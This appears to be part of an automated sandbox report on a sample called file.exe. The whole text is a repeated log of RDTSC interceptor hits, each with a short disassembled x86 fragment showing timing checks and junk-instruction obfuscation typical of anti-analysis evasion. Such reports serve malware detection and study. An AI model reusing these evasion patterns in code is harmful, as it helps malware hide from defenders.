                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A6E9 second address: 53A726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F55E4D1D2E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007F55E4D1D2D6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F55E4D1D2DFh 0x0000001e push eax 0x0000001f pop eax 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A726 second address: 53A72A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BFF3 second address: 53BFFD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C06D second address: 53C09D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jng 00007F55E4D0512Ch 0x00000011 push 00000000h 0x00000013 mov cx, D105h 0x00000017 push C1665E61h 0x0000001c jno 00007F55E4D05134h 0x00000022 push eax 0x00000023 push edx 0x00000024 jp 00007F55E4D05126h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C09D second address: 53C0DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 3E99A21Fh 0x0000000d mov dword ptr [ebp+122D1B08h], esi 0x00000013 push 00000003h 0x00000015 xor cx, 484Dh 0x0000001a push 00000000h 0x0000001c stc 0x0000001d push 00000003h 0x0000001f mov ch, D7h 0x00000021 push 923131CEh 0x00000026 push eax 0x00000027 push edx 0x00000028 jp 00007F55E4D1D2E6h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0DB second address: 53C0E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0E0 second address: 53C0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0E6 second address: 53C122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 523131CEh 0x0000000e mov edi, dword ptr [ebp+122D2AC9h] 0x00000014 lea ebx, dword ptr [ebp+12451F42h] 0x0000001a mov esi, dword ptr [ebp+122D2E0Dh] 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F55E4D05134h 0x00000026 push eax 0x00000027 push edi 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C18F second address: 53C195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C195 second address: 53C1C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D0512Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e sub si, 0622h 0x00000013 call 00007F55E4D05129h 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007F55E4D05128h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C1C4 second address: 53C1DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C1DF second address: 53C1F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D0512Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C1F0 second address: 53C1F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C1F6 second address: 53C214 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F55E4D0512Ah 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C214 second address: 53C2C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F55E4D1D2E7h 0x00000013 jng 00007F55E4D1D2D8h 0x00000019 popad 0x0000001a pop eax 0x0000001b mov ch, bh 0x0000001d push 00000003h 0x0000001f jmp 00007F55E4D1D2DAh 0x00000024 push 00000000h 0x00000026 mov ecx, ebx 0x00000028 push 00000003h 0x0000002a xor edx, 6FB2EF9Ah 0x00000030 push 89D67671h 0x00000035 pushad 0x00000036 jmp 00007F55E4D1D2E6h 0x0000003b jmp 00007F55E4D1D2E5h 0x00000040 popad 0x00000041 xor dword ptr [esp], 49D67671h 0x00000048 mov esi, 698C7F92h 0x0000004d lea ebx, dword ptr [ebp+12451F4Bh] 0x00000053 mov di, cx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F55E4D1D2E0h 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C36D second address: 53C39E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05135h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F55E4D0512Ch 0x0000000f jbe 00007F55E4D05126h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F55E4D05128h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C39E second address: 53C3D6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F55E4D1D2D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F55E4D1D2DAh 0x00000012 movzx esi, si 0x00000015 pop ecx 0x00000016 push 00000000h 0x00000018 mov dl, al 0x0000001a push FDAD8F41h 0x0000001f pushad 0x00000020 jmp 00007F55E4D1D2E0h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C3D6 second address: 53C3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C3DC second address: 53C417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 0252713Fh 0x0000000d pushad 0x0000000e popad 0x0000000f mov dword ptr [ebp+122D1B14h], eax 0x00000015 push 00000003h 0x00000017 adc esi, 0A839250h 0x0000001d push 00000000h 0x0000001f mov edi, dword ptr [ebp+122D2D31h] 0x00000025 push 00000003h 0x00000027 mov ecx, dword ptr [ebp+122D2DD5h] 0x0000002d push 71F466A2h 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 jng 00007F55E4D1D2D6h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524108 second address: 524110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524110 second address: 524119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B8CA second address: 55B8DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F55E4D0512Bh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B8DD second address: 55B901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F55E4D1D2DCh 0x0000000f ja 00007F55E4D1D2D6h 0x00000015 popad 0x00000016 push ebx 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BA9E second address: 55BAAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jg 00007F55E4D05126h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BBFE second address: 55BC08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BC08 second address: 55BC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BEBA second address: 55BEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BEC3 second address: 55BEC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BEC9 second address: 55BEEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jo 00007F55E4D1D2D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C02F second address: 55C070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F55E4D05141h 0x0000000c jp 00007F55E4D05135h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F55E4D0512Dh 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C070 second address: 55C078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C078 second address: 55C08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F55E4D05126h 0x0000000f jne 00007F55E4D05126h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C203 second address: 55C207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C207 second address: 55C21D instructions: 0x00000000 rdtsc 0x00000002 js 00007F55E4D05126h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F55E4D0512Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C21D second address: 55C23E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F55E4D1D2DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F55E4D1D2F8h 0x00000010 pushad 0x00000011 jg 00007F55E4D1D2D6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C23E second address: 55C24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F55E4D05126h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C9FF second address: 55CA0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CA0B second address: 55CA56 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F55E4D05133h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d js 00007F55E4D0513Eh 0x00000013 push edx 0x00000014 je 00007F55E4D05126h 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jl 00007F55E4D05126h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CA56 second address: 55CA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5507A3 second address: 5507D0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D05126h 0x00000008 jno 00007F55E4D05126h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F55E4D05139h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5507D0 second address: 5507D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5507D4 second address: 5507DE instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D05126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5507DE second address: 5507FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F55E4D1D2E0h 0x0000000c js 00007F55E4D1D2D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CD07 second address: 55CD0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D209 second address: 55D215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F55E4D1D2D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D32E second address: 55D332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D4A5 second address: 55D4A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240FF second address: 524108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51D451 second address: 51D470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F55E4D1D2E7h 0x0000000e jmp 00007F55E4D1D2E1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56771F second address: 567743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F55E4D05126h 0x0000000a pushad 0x0000000b ja 00007F55E4D05126h 0x00000011 jmp 00007F55E4D05130h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567743 second address: 567774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F55E4D1D2D6h 0x00000009 jmp 00007F55E4D1D2E7h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F55E4D1D2DDh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567A8E second address: 567A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569740 second address: 569749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569899 second address: 5698EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F55E4D0512Dh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F55E4D05138h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F55E4D05132h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007F55E4D05126h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569EBF second address: 569EC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A47B second address: 56A485 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A485 second address: 56A48A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A4FD second address: 56A55E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F55E4D0512Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F55E4D05139h 0x00000010 xchg eax, ebx 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F55E4D05128h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov si, EA2Fh 0x0000002f push eax 0x00000030 pushad 0x00000031 push edi 0x00000032 jp 00007F55E4D05126h 0x00000038 pop edi 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A6AC second address: 56A6C1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jo 00007F55E4D1D2E4h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A6C1 second address: 56A6C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A849 second address: 56A84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A946 second address: 56A950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F55E4D05126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AA93 second address: 56AADE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007F55E4D1D2D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F55E4D1D2D8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b xchg eax, ebx 0x0000002c jmp 00007F55E4D1D2DFh 0x00000031 push eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AADE second address: 56AAE7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AF7D second address: 56AF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AF81 second address: 56AF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F55E4D0512Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C95F second address: 56C96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F55E4D1D2D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C96C second address: 56C970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C129 second address: 56C133 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C133 second address: 56C139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C139 second address: 56C13D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C13D second address: 56C15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F55E4D05137h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C15F second address: 56C164 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D555 second address: 56D559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56EB77 second address: 56EB88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E8CD second address: 56E8E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05136h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E8E7 second address: 56E8EC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57007E second address: 570083 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570083 second address: 570091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570091 second address: 570097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570097 second address: 57009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57604B second address: 576052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576052 second address: 576057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576544 second address: 57654A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57654A second address: 57654E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57654E second address: 57657B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jbe 00007F55E4D05126h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F55E4D05135h 0x0000001d rdtsc
